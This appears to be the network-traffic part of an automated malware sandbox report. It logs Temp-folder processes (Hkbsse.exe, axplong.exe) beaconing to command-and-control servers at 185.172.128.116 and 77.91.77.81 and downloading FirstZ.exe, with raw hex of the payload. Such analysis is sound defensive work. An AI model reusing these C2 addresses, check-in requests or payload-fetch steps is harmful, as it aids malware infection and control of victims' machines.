Jun 24, 2024 00:10:20.900958061 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c3 66 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 40 00 48 83 ec 28 48 8b 05 85 ba Data Ascii: ff.@H(HY1HYHYHLYHYf8MZuHcP<H8PEtiHYZtF W HY7 HYG1 H@Y8tS1H
Jun 24, 2024 00:10:20.900968075 CEST	1236	IN	Data Raw: b5 59 00 c7 06 01 00 00 00 e8 67 db 20 00 e9 80 fd ff ff 89 c1 e8 1b db 20 00 90 66 2e 0f 1f 84 00 00 00 00 00 48 83 ec 28 48 8b 05 b5 b5 59 00 c7 00 01 00 00 00 e8 ba fc ff ff 90 90 48 83 c4 28 c3 0f 1f 00 48 83 ec 28 48 8b 05 95 b5 59 00 c7 00 Data Ascii: Yg f.H(HYH(H(HYH(H( HH(H@ Go build ID: "zuU7nTMqnBAWqPGHuIHD/M_p306aY1VM6PMcsE89u/HXCPbGlZ_DnRWXcHVARV
Jun 24, 2024 00:10:20.901060104 CEST	1236	IN	Data Raw: 48 19 ff 49 21 f8 4c 01 c3 41 f6 c1 80 75 bb 90 48 8d 04 30 48 8d 40 03 48 85 db 7c 1e 48 89 c1 48 f7 d9 48 39 d9 72 02 5d c3 48 85 c0 74 07 66 90 e8 1b c1 05 00 e8 56 c1 05 00 e8 11 c1 05 00 e8 cc 44 03 00 e8 c7 44 03 00 90 48 89 44 24 08 90 e8 Data Ascii: HI!LAuH0H@H\|HHH9r]HtfVDDHD$1HD$Ld$M;fUHHH$H$H fH _H$H$H$H$HE
Jun 24, 2024 00:10:20.901149035 CEST	896	IN	Data Raw: 0f b6 44 24 29 e9 93 fb ff ff cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 48 89 e5 48 83 ec 10 4d 8b 66 20 4d 85 e4 75 5f 48 85 c0 74 54 48 8b 00 48 8b 0d e8 0c 24 00 48 8b 15 d9 0c 24 00 48 39 c1 7e 14 76 37 48 c1 e0 04 48 8b 0c Data Ascii: D$)UHHMf Mu_HtTHH$H$H9~v7HHHTHvHHRHHH]1H{OOQ}Ll$ M9,$uI$$Mf MuHHuHH@1HLl$M9,$uI$$
Jun 24, 2024 00:10:20.901160002 CEST	1236	IN	Data Raw: 0f 82 8d 04 00 00 48 29 cb 48 8d 7b ff 49 89 f8 48 f7 df 48 c1 ff 3f 48 21 fe 48 01 c6 48 83 f9 04 7c 9c 81 38 63 70 75 2e 75 94 31 d2 e9 ab 02 00 00 48 c7 c2 ff ff ff ff 4c 89 44 24 50 48 89 74 24 70 48 85 d2 0f 8c 65 01 00 00 48 39 ca 0f 87 30 Data Ascii: H)H{IHH?H!HH\|8cpu.u1HLD$PHt$pHeH90HHzIHH?LRH8L9LL$HH\$`H)LYL\$ MII?M!NL\$XHuFfAonuzH'HunF,@fAofu]FTAfuQH
Jun 24, 2024 00:10:20.901170969 CEST	1236	IN	Data Raw: cc cc cc cc cc cc cc cc cc 49 3b 66 10 0f 86 7f 07 00 00 55 48 89 e5 48 83 ec 50 48 8d 05 87 9a 28 00 e8 22 b7 00 00 48 c7 40 08 03 00 00 00 48 8d 0d aa e8 2d 00 48 89 08 48 8d 0d 0a f9 5f 00 48 89 48 10 48 c7 40 28 03 00 00 00 48 8d 0d 90 e8 2d Data Ascii: I;fUHHPH("H@H-HH_HHH@(H-HH H_HH0H@HHq-HH@H_HHPH@hH-HH`H_HHpHH-HH_HHH-HHp_HHJZ
Jun 24, 2024 00:10:20.901185036 CEST	1236	IN	Data Raw: 08 70 49 89 53 08 48 8d 15 11 e6 2d 00 48 89 54 08 60 48 8d 15 61 f4 5f 00 48 89 54 08 70 48 c7 84 08 88 00 00 00 03 00 00 00 c6 84 08 98 00 00 00 00 c6 84 08 99 00 00 00 00 83 3d a4 ec 5f 00 00 74 1c 48 8b 94 08 80 00 00 00 e8 e5 3e 06 00 49 89 Data Ascii: pISH-HT`Ha_HTpH=_tH>IHISH-HH_HH$KEWL5_eM6M6D$D$DH$EWL5_eM6M6D$_H$EWL5_eM6M
Jun 24, 2024 00:10:20.901195049 CEST	1236	IN	Data Raw: 00 48 39 93 88 00 00 00 75 7c 48 8b 90 90 00 00 00 48 39 93 90 00 00 00 75 6c 0f b6 90 98 00 00 00 38 93 98 00 00 00 75 5d 0f b6 90 99 00 00 00 38 93 99 00 00 00 75 4e 48 8b 93 a8 00 00 00 66 90 48 39 90 a8 00 00 00 75 3c 48 8b 90 b0 00 00 00 48 Data Ascii: H9u\|HH9ul8u]8uNHfH9u<HH9u,8u8uHD$0H\$811H ]HL$HHD$0H\$8H}THL$HH4H<HLHH9tHT$HrHH\|$8H>LD$0JJL
Jun 24, 2024 00:10:20.901592970 CEST	1236	IN	Data Raw: 89 44 24 50 48 89 4c 24 60 31 d2 31 f6 eb 13 44 69 c6 93 01 00 01 44 0f b6 0c 11 48 ff c2 43 8d 34 08 48 39 d7 7f e8 48 89 fa 41 b8 93 01 00 01 41 b9 01 00 00 00 eb 1f 45 89 ca 45 0f af d0 49 89 fb 49 d1 fb 45 0f af c0 48 f7 c7 01 00 00 00 45 0f Data Ascii: D$PHL$`11DiDHC4H9HAAEEIIEHEELH1E1EiD8HGH9~H9wgHT$8H\$XHD$PHL$`DL$t$A9uEfDH9+DD$ HHgu'HD$PHL$`HT$8H\$Xt$DD$ DL$H1
Jun 24, 2024 00:10:20.901613951 CEST	1236	IN	Data Raw: 77 e9 08 fe ff ff cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 f2 48 89 c6 e9 b5 fd ff ff cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 c6 48 89 fa 48 89 cf e9 92 fd ff ff cc cc cc cc cc cc cc cc cc cc cc Data Ascii: wHHHHHfHnf`f`fpH\|nIHH HDoftfIHH9vHt-HH)IIIoftfL!IM Ht1HFft/I

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49726	185.172.128.116	80	3664	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:10:20.237174034 CEST	185	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 31 Cache-Control: no-cache Data Raw: 65 31 3d 31 30 30 30 30 31 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: e1=1000014001&unit=246122658369
Jun 24, 2024 00:10:20.869786024 CEST	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0
Jun 24, 2024 00:10:20.908901930 CEST	51	OUT	GET /FirstZ.exe HTTP/1.1 Host: 185.172.128.116
Jun 24, 2024 00:10:21.097379923 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:21 GMT Content-Type: application/octet-stream Content-Length: 2665984 Last-Modified: Mon, 29 May 2023 20:39:56 GMT Connection: keep-alive ETag: "64750d9c-28ae00" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 64 86 08 00 9c d2 ae 65 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 00 00 92 00 00 00 18 28 00 00 00 00 00 40 11 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 30 29 00 00 04 00 00 00 00 00 00 02 00 60 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 a8 cb 00 00 3c 00 00 00 00 00 29 00 88 14 00 00 00 d0 28 00 8c 01 00 00 00 00 00 00 00 00 00 00 00 20 29 00 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 b0 00 00 28 00 00 00 10 b4 [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEde"(@@0)`<)( )x(8@X.textV `.rdata"$@@.data''@.pdata((@@.00cfg((@@.tls((@.rsrc)(@@.relocx )(@B
Jun 24, 2024 00:10:21.097404957 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 56 48 83 ec 20 48 8b 05 1c a0 00 00 c7 00 01 00 00 00 48 8b 05 17 a0 00 00 Data Ascii: VH HHHH1MZuKHcQ<<PEu>HQtu'ytr!HrH19H9(H00H
Jun 24, 2024 00:10:21.097417116 CEST	1236	IN	Data Raw: 05 5c cb 00 00 d1 fa 5f d3 e8 eb fe ff ff c7 05 4d cb 00 00 60 34 2a de e8 dc fe ff ff c7 05 3e cb 00 00 83 80 04 8f e8 cd fe ff ff c7 05 2f cb 00 00 85 92 87 02 e8 be fe ff ff c7 05 20 cb 00 00 c7 9b 2a e9 e8 af fe ff ff c7 05 11 cb 00 00 5d 6c Data Ascii: \_M`4>/ ]laK>s~d68U?Fn7)?(5@d{ql
Jun 24, 2024 00:10:21.097501993 CEST	672	IN	Data Raw: 00 8b 03 8b 4b 04 42 03 04 31 4c 01 f1 89 45 04 48 83 ec 20 41 b8 04 00 00 00 48 89 f2 e8 0f 02 00 00 48 83 c4 20 48 83 c3 08 48 39 fb 72 d2 8b 05 04 9b 28 00 85 c0 7e 67 bf 10 00 00 00 48 8b 15 ec 9a 28 00 31 db 48 8d 75 f8 4c 8b 35 bf b4 00 00 Data Ascii: KB1LEH AHH HH9r(~gH(1HuL5ffff.HHcH(H9}0DD:EtHL:H:H IAH H((He[_^A\A]A^A_]S[HH;yaL5L=AHuIf
Jun 24, 2024 00:10:21.097513914 CEST	1236	IN	Data Raw: e8 9c 07 00 00 48 85 c0 0f 84 d7 00 00 00 49 89 c6 48 8b 05 79 98 28 00 4a 8d 0c fd 00 00 00 00 4c 8d 24 89 4e 89 74 20 20 42 c7 04 20 00 00 00 00 e8 8b 08 00 00 41 8b 4e 0c 48 01 c1 48 8b 05 4d 98 28 00 4a 89 4c 20 18 48 8d 54 24 28 41 b8 30 00 Data Ascii: HIHy(JL$Nt B ANHHM(JL HT$(A0HD$L~tQ@tL=tEAtt3A@HL$(H(ONJLHT$@JTtR(HHIKHX[_^A\A^A_HH=
Jun 24, 2024 00:10:21.097524881 CEST	1236	IN	Data Raw: 57 53 48 83 ec 28 83 fa 03 0f 87 80 01 00 00 89 d0 48 8d 0d 05 93 00 00 48 63 04 81 48 01 c8 ff e0 83 3d c5 93 28 00 00 0f 84 07 01 00 00 48 8d 0d c0 93 28 00 ff 15 2a ad 00 00 48 8b 3d db 93 28 00 48 85 ff 0f 84 dd 00 00 00 48 8b 1d 43 ad 00 00 Data Ascii: WSH(HHcH=(H(*H=(HHCL5fHHHAuHtHGH(=Z(uHY(A(=+(H&(H=A(HHL5z
Jun 24, 2024 00:10:21.097537041 CEST	1236	IN	Data Raw: 0f b7 40 18 41 81 f8 0b 02 00 00 75 69 44 8b 80 90 00 00 00 4d 85 c0 74 5d 44 0f b7 48 06 4d 85 c9 74 53 44 0f b7 50 14 49 c1 e1 03 4f 8d 0c 89 49 01 c2 49 83 c2 24 31 c0 45 31 db eb 14 66 66 2e 0f 1f 84 00 00 00 00 00 49 83 c3 28 45 39 d9 74 26 Data Ascii: @AuiDMt]DHMtSDPIOII$1E1ff.I(E9t&C4D9wCtD9vLH1zu&1^ffffff.Hzu:tHQPH=HL$rHHH-H=wH)HXYAWAVAUATVWUSHX)$@
Jun 24, 2024 00:10:21.097603083 CEST	1236	IN	Data Raw: 10 48 09 c7 48 09 f7 41 c7 44 24 08 01 00 00 00 49 c7 44 24 10 fd ff ff ff 49 89 7c 24 38 48 8b 44 24 78 49 89 44 24 40 48 8b 41 20 0f 10 40 50 41 0f 11 44 24 50 41 83 e6 fe 41 c1 e6 10 4c 8b bc 24 a0 00 00 00 4d 09 fe 4d 89 74 24 60 c1 e5 10 4c Data Ascii: HHAD$ID$I\|$8HD$xID$@HA @PAD$PAAL$MMt$`LH$0I\|$hIl$pH$ID$xHA HI$H$I$H$I$HA HI$W$ $$$$H$
Jun 24, 2024 00:10:21.097615004 CEST	1236	IN	Data Raw: 81 c4 60 00 01 00 5b 5d 5f 5e 41 5e c3 cc cc cc cc 41 56 56 57 55 53 48 83 ec 40 4c 89 c6 48 89 d7 48 89 cb e8 58 02 00 00 48 89 f8 48 c1 e8 02 48 8d 04 40 48 89 06 48 89 44 24 38 48 c7 44 24 30 00 00 00 00 c7 44 24 28 04 00 00 00 c7 44 24 20 00 Data Ascii: `[]_^A^AVVWUSH@LHHXHHH@HHD$8HD$0D$(D$ HT$0E1LL$8HE1Hl$0A>1IHI9B3Ps3Ps;Ps8?/t1+AD0fffff.ff.
Jun 24, 2024 00:10:21.098196030 CEST	552	IN	Data Raw: b7 c0 83 f8 5c 75 d6 41 b8 10 02 00 00 4c 89 f1 31 d2 e8 06 6c 00 00 80 3d d4 80 28 00 00 0f 84 24 01 00 00 80 3d d4 81 28 00 00 74 33 f3 0f 7e 05 c0 81 28 00 66 0f fd c7 66 41 0f db c0 66 0f d6 05 af 81 28 00 8b 05 b1 81 28 00 83 c0 13 0f b6 c0 Data Ascii: \uAL1l=($=(t3~(ffAf((f((LH(jLLjHD$`LjEfL$bfD$`Lt$h)$)$$0$@H$H$0D$PHD$HD$@
Jun 24, 2024 00:10:21.098273993 CEST	1236	IN	Data Raw: 45 02 00 00 00 01 c0 66 89 8c 24 82 00 00 00 66 89 84 24 80 00 00 00 48 89 b4 24 88 00 00 00 0f 57 f6 0f 29 b4 24 d0 00 00 00 0f 29 b4 24 e0 00 00 00 c7 84 24 d0 00 00 00 30 00 00 00 c7 84 24 e8 00 00 00 40 00 00 00 48 8d 84 24 80 00 00 00 48 89 Data Ascii: Ef$f$H$W)$)$$0$@H$H$)$HD$`)$D$PHD$HD$@ D$8D$0D$(HD$ HL$`L$H$Ix;HL$`t$8D$tD$0H$HD$(Ht

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	49732	185.172.128.116	80	3664	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:10:24.056370020 CEST	185	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 30 30 31 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000015001&unit=246122658369
Jun 24, 2024 00:10:24.688728094 CEST	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	49735	185.172.128.116	80	3664	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:10:24.802401066 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 24, 2024 00:10:25.442668915 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 24, 2024 00:10:25.445534945 CEST	311	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 34 34 39 43 45 46 43 31 42 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5449CEFC1BA2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Jun 24, 2024 00:10:25.637453079 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	49737	185.172.128.116	80	3664	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:10:25.772099972 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 24, 2024 00:10:26.430819988 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 24, 2024 00:10:26.542037964 CEST	311	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 34 34 39 43 45 46 43 31 42 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5449CEFC1BA2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Jun 24, 2024 00:10:26.737924099 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	49739	77.91.77.81	80	6024	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:10:26.637002945 CEST	180	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 30 30 39 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000094001&unit=246122658369
Jun 24, 2024 00:10:27.325557947 CEST	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.5	49740	185.172.128.116	80	3664	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:10:26.861963034 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 24, 2024 00:10:27.507565975 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 24, 2024 00:10:27.520538092 CEST	311	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 34 34 39 43 45 46 43 31 42 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5449CEFC1BA2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Jun 24, 2024 00:10:27.714910030 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.5	49741	77.91.77.81	80	6024	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:10:27.470210075 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 24, 2024 00:10:28.157401085 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 24, 2024 00:10:28.173321009 CEST	306	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 39 41 33 34 36 43 33 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6CCF9A346C3FBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jun 24, 2024 00:10:28.390669107 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.5	49743	185.172.128.116	80	3664	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:10:27.874439001 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 24, 2024 00:10:28.504647970 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 24, 2024 00:10:28.524537086 CEST	311	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 34 34 39 43 45 46 43 31 42 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5449CEFC1BA2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Jun 24, 2024 00:10:28.714803934 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.5	49745	77.91.77.81	80	6024	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:10:28.638025045 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
